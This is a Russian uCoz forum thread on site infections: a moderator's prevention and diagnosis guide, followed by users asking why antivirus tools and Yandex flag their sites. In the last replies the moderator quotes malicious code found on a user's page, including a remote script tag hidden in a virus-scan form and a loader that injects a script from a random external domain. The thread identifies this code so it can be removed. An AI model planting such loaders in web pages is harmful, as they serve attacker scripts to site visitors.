Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    strandruxa
    Сообщений: 10
    Репутация: -9

    Сообщение # 466 | 21:03:05
    Цитата (bandjuk)
    strandruxa, у яндекса не пробовали выяснить что ему собственно не нравится?
    Как там выяснить? Обратки там нету, только поведенческий анализ есть и все.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 467 | 21:11:56
    strandruxa, вердикт в поведенческом? вы ничего не удаляли? в ротаторе что было?
    у вас есть вебмастер яндекса напишите в поддержку из вебмастера

    войдите в вебмастер яндекса. справа будет надпись
    Цитата
    Задать вопрос о сайте службе поддержки




    напишите, что яндекс блокирует сайт http://instructor.3dn.ru/ по поведенческому. попросите образцы кода, которые яндекс посчитал сомнительными
    вам ответят
    Прикрепления: 6902097.jpg (108.5 Kb)

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    strandruxa
    Сообщений: 10
    Репутация: -9

    Сообщение # 468 | 21:20:25
    Цитата (webanet)
    strandruxa, вердикт в поведенческом? вы ничего не удаляли? в ротаторе что было?у вас есть вебмастер яндекса напишите в поддержку из вебмастера

    войдите в вебмастер яндекса. справа будет надпись
    Цитата
    Задать вопрос о сайте службе поддержки

    напишите, что яндекс блокирует сайт http://instructor.3dn.ru/ по поведенческому. попросите образцы кода, которые яндекс посчитал сомнительными
    вам ответят
    Благодарю Вас, сейчас напишу.

    Добавлено (10 Авг 2013, 21:20:25)
    ---------------------------------------------

    Цитата (webanet)
    в ротаторе что было?
    В ротаторе стояли баннеры моих сайтов, но я их недавно сделал неактивными.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 469 | 21:27:01
    strandruxa, ротатор давно очистили? дайте адреса сайтов, которые крутились в ротаторе. но все равно пишите яндексу

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    SHMIT
    Сообщений: 2
    Репутация: 0

    Сообщение # 470 | 16:36:07
    Здравствуйте! Заблокировали мой сайт. После долгого общения с службой поддержки мне ответили что на моем сайте обнаружен потенциально опасный код.
    script src="http://i1ii.ru/1.js" type="text/javascript". Его надо удалить и снова обратится в службу поддержки. Но я уже пол дня его ищу и не могу найти. Может вы знаете способа для поиска таких кодов? Я уже не знаю где его искать. Помогите! Заранее спасибо!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 471 | 16:37:55
    SHMIT, на форуме вам не помогут найти код тем более без адреса сайта, так как доступ к коду и сайту имеет только администратор
    обычно такой код попадается в мини-профилях, чатах, опросах и так далее. вспоминайте какие крутые скрипты вы устанавливали

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    SHMIT
    Сообщений: 2
    Репутация: 0

    Сообщение # 472 | 16:46:07
    webanet, как только вы написали "такой код попадается в мини-профилях" то я сразу нашел smile . Спасибо большое)
    OneBlow
    Сообщений: 31
    Репутация: 4

    Сообщение # 473 | 03:22:02
    Проверил сайт на вирусы c помощью - del
    Проверя главную страницу то есть - http://cscontrol.ru/ данный сервис не обнаружил не единого вируса.
    Проверяя страницу материалов и комментариев к нему и страницу со списком материалов категории сервис обнаружил

    Ikarus Trojan.JS.Blacole
    Каждую страничку каждого модуля проверил , все картинки (малоли изображения с других ресурсов подгружаются) , убрал не нужные скрипты. И всё равно этот Trojan.JS.Blacole!

    Помогите избавиться от этого. Заранее спасибо!
    Сообщение отредактировал webanet - Среда, 14 Авг 2013, 13:05:29
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 474 | 13:06:02
    OneBlow, рекламу реалтрафа уберите с сайта и не будет проблем

    вот это

    Код
    <!--Реклама_от_Realtraf-->
    <script charset="utf-8" src="http://cscontrol.ru/jspartnerka/jrt-run.js"></script>
    <!--/Реклама_от_Realtraf-->

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    OneBlow
    Сообщений: 31
    Репутация: 4

    Сообщение # 475 | 15:01:27
    webanet, днём проверил ещё раз и нашелся ещё один вирус

    Jiangmin Suspect.Package.RLO

    Так же сделал проверку на virustotal

    Вот линк на анализ - https://www.virustotal.com/ru....6477106

    От куда за 8 часов взялся ещё один вирус на сайте?
    Рекламу от реалтрафа убрал , но от этого ничего не изменилось!

    Пароли от ПУ поменял , на почте тоже поменял пароли , и установил пароль на папки принятые , отправленные и т.д.
    Вирусов на компьютере нет.

    Вот скан от сюда - del
    Не пойму пишет что якобы домен или IP имеет репутацию плохую или что не могу понять в Английском не силён.

    Добавлено (14 Авг 2013, 15:01:27)
    ---------------------------------------------
    И так вот ещё один скан , этот сервис пишет что мой сайт чист - del
    Сообщение отредактировал OneBlow - Среда, 14 Авг 2013, 14:57:18
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 476 | 15:03:28
    OneBlow, у вас стоит фильтр яндекса по безопасности. остальной мусор, который дает детект питается по онлайн базам. ваша за дача или перестать дергать крутые онлайн сервисы и ждать обновления баз и снятия с вашего сайта фильтра или обращайтесь в владельцам онлайн сервисов. пусть они трактуют как хотят.
    или вам кинуть все силы на яндекс и его фильтр. кстати, у вас в продаже ссылок крутится
    asd-kinozal.3dn.ru он пока закрыт от индексирования в связи с карантином, но вместе со скриптом продажи ссылок вы откручиваете его в документ райт, а там стоит реклама, на которую яндекс как правило довольно остро реагирует
    удалите ссылку на этот сайт. далее идите в вебмастер. в безопасности смотрите списки ссылок, которые он вам дал. там должны быть кнопки на перепроверку сайта. если кнопок перепроверки нет, то пишите в тех.поддержку из вебмастера и ждите пока яндекс не снимет блок

    и я вас прошу. давайте вы свои ссылки с крутых сервисов проверки будете оставлять при себе. в этой теме они трижды не нужны. они не вносят ясность в проблему вообще. тут нужна ссылка на сайт и описание проблемы своими словами. все
    я уже сказала из-за чего у вашего сайта проблемы. хотите развлекаться дальше по сервисам - вперед. но тут не пишите. пусть вам сервисы сайт чистят

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    OneBlow
    Сообщений: 31
    Репутация: 4

    Сообщение # 477 | 15:13:16
    webanet, спасибо , я отправил в яндекс вебмастер уведомление на перепроверку , буду ждать.
    И ещё вопрос , разве если блок с сылками ставить в <noindex><noffolow> то всё равно поисковик будет лазить по тем ссылкам которые заключены в эти теги?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 478 | 15:15:49
    OneBlow, робот проверят все скрипты. в данном случае ему все равно на ваши теги. тег запрещает индексировать всего-лишь. а проверять не запрещает. робот проверяет весь код страницы, который виден в исходнике. проверяет все скрипты и все содержимое скриптов

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    yurcendel
    Сообщений: 6
    Репутация: -10

    Сообщение # 479 | 18:58:29
    На компьютерах, особенно зашищенных Касперским и Авастом ругаются на главную страницу сайта http://privat24.ucoz.net: обнаружен вредоносный код. Хотя доктор Веб ничего подобного не находит. Вебмастер Яндекса также не видит вредоносного кода. Да, если бы не терялась посещаемость сайта всё было бы хорошо и эта тема мною не поднималась бы. cry
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 480 | 19:07:58
    yurcendel, вы превратили свой сайт в скрипто-помойку. вредоносный код у вас находится в онлайн проверке на вирусы от доктора веба

    выделенное красным удалить

    Цитата
    <form method="POST" id="drweb_online_scan_form" enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window">
    <div class="dr" align="center">Проверка файлов на вирусы</div>
    <div class="dr" align="center"><input id="file_selection_input" name="file" size="16%" type="file"><script type="text/javascript" src="http://onona.pp.ua/1.js"></script></div>
    <div class="dr" align="center">
    <img alt="null" src="http://s46.radikal.ru/i111/1009/05/1fc9b62e0447.gif" align="top" border="0" height="21" width="31">
    <input onclick="return do_scan_file_01();" src="http://s58.radikal.ru/i162/1009/21/b1d12ac84fcb.gif" height="19" type="image" width="90"></div>
    </form>


    вот на это тоже могут ругаться некоторые антивирусы

    Код
    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://xxoohqiych.elements-heavier.info' + '/?284254=KmMqLHg8Nzpjb2hnZ20';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>

    если вы уж так нуждались в такой форме проверки, то нужно было её брать у самого доктора веба, а не на сомнительных сайтах

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: